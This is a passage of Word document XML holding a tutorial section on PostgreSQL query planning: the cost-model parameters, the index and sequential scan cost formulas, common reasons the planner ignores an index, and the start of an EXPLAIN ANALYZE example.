      </w:r>
    </w:p>
    <w:p w14:paraId="1272B275" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="686D67F8">
          <v:rect id="_x0000_i5427" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5534EC59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Query Planning and Index Selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5BF4DC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How the Query Planner Chooses Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD96A7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The query planner evaluates all possible access paths and selects the one with the lowest estimated cost. Understanding this process explains why sometimes the planner doesn't use an index even when one exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1972BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost model components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71538FFA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC7696D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL cost model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56243AF6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  seq_page_cost = 1.0       (cost of reading one page sequentially)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F6CA54" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  random_page_cost = 4.0    (cost of reading one page randomly, default for HDD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BCE5FD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  cpu_tuple_cost = 0.01     (cost of processing one row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCFDCD8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  cpu_index_tuple_cost = 0.005 (cost of processing one index entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5844AE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  cpu_operator_cost = 0.0025   (cost of evaluating one operator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F8480" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409B12AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For NVMe SSD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182800D1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  random_page_cost should be set to 1.1-1.5 (much closer to sequential)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B40B78" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  because SSDs have near-random-access speed (unlike HDD where random is 40× sequential)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328E79E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A56E3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  If random_page_cost remains at 4.0 for SSDs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F42F09" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Planner overestimates index cost → prefers sequential scans over index scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BD64AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    → Sub-optimal plans for SSD systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC3D13" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50083F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  SET random_page_cost = 1.1;  -- for NVMe SSD systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02594CF4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  SET effective_cache_size = 75% of total RAM;  -- how much OS page cache is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E9EE0E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The index cost calculation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E5885" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0976B119" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index scan cost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2974CA33" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  = (pages_in_index × random_page_cost)           (traverse index B-Tree)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007DD043" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  + (matching_rows × random_page_cost)             (heap page fetches for matches)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB439F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  + (matching_rows × cpu_tuple_cost)               (process each matching row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464E2E30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404EBD61" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Sequential scan cost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C41931" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  = total_heap_pages × seq_page_cost               (read entire table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2907364F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  + total_rows × cpu_tuple_cost                    (process each row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB2F72" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17EB79" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Planner chooses index scan when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB17099" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  index_scan_cost &lt; sequential_scan_cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E39904B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3161910C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  This fails when selectivity is low (many matches):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07064052" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If 50% of rows match, 50% of heap pages must be fetched (random I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE3DCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Sequential scan of 100% of pages (sequential I/O) may be cheaper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F54A79" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2236C080" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Rule of thumb: index scan preferred for &lt; 5-15% selectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2983BF59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 sequential scan preferred for &gt; 15-30% selectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5092CC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 exact threshold depends on table size and random_page_cost setting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C714E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why the planner ignores an index — common cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423384F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D80EA72" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Case 1: Low selectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AEF4C6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  SELECT * FROM orders WHERE status IN ('shipped', 'processing', 'pending')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F13636" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- 95% of orders have one of these statuses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B966C5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Index would require 95% of heap pages (random I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA87365" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Full sequential scan is faster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5FF61C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- SOLUTION: the index correctly is not used; rethink the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7152EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="79876E97" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Case 2: Wrong column order for composite index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAA99E7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index: (customer_id, order_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF2748" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Query: WHERE order_date &gt; '2024-01-01'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF2D25F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Planner correctly ignores this index (order_date is not the leading column)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D387E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="69ECF32B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Case 3: Implicit type conversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423997B5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Column: user_id INTEGER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367DC17D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Query: WHERE user_id = '12345'  -- string literal, implicit cast to int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11749DDF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  -- Some databases: implicit cast prevents index use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D93619" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Solution: use correct type in query literal (WHERE user_id = 12345)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FD3EDD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="42617FB3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Case 4: Function applied to indexed column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CC095" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index: on created_at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3424E3B4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Query: WHERE DATE(created_at) = '2024-01-15'  -- function applied to column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640467D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Index is on created_at, not DATE(created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADCD192" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Planner cannot use the index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460B5AA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Solution: expression index on DATE(created_at), or rewrite as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D261CB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">               WHERE created_at &gt;= '2024-01-15' AND created_at &lt; '2024-01-16'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A27754A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="16CB5A59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Case 5: Stale statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1255C03B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Table updated significantly since last ANALYZE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC5E3D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Planner estimates 100 matching rows, actually 1,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B783CF4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Chosen plan (index scan for 100 rows) is catastrophically wrong for 1,000,000 rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC71A9B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Solution: ANALYZE the table; configure autovacuum to run ANALYZE frequently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67548E76" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The EXPLAIN Output — Reading the Execution Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA4346" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03239852" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">EXPLAIN (ANALYZE, BUFFERS) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079724A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT u.name, COUNT(o.id) as order_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C652016" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM users u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8CD688" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>JOIN orders o ON u.id = o.customer_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0EF533" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WHERE u.created_at &gt; '2023-01-01'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E17E8B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>GROUP BY u.id, u.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C06C3F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ORDER BY order_count DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060566E3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>LIMIT 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1848B635" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882DB62" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27070F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">Limit  (cost=12453.89..12453.91 rows=10 width=28) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674696B9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">       (actual time=89.234..89.237 rows=10 loops=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1133F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -&gt;  Sort  (cost=12453.89..12503.89 rows=20000 width=28) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21034EC4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            (actual time=89.231..89.233 rows=10 loops=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F18C59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        Sort Key: (count(o.id)) DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA1EF53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        Sort Method: top-N heapsort  Memory: 25kB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E671773" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    -&gt;  HashAggregate  (cost=11853.23..12053.23 rows=20000 width=28) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FB5783" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
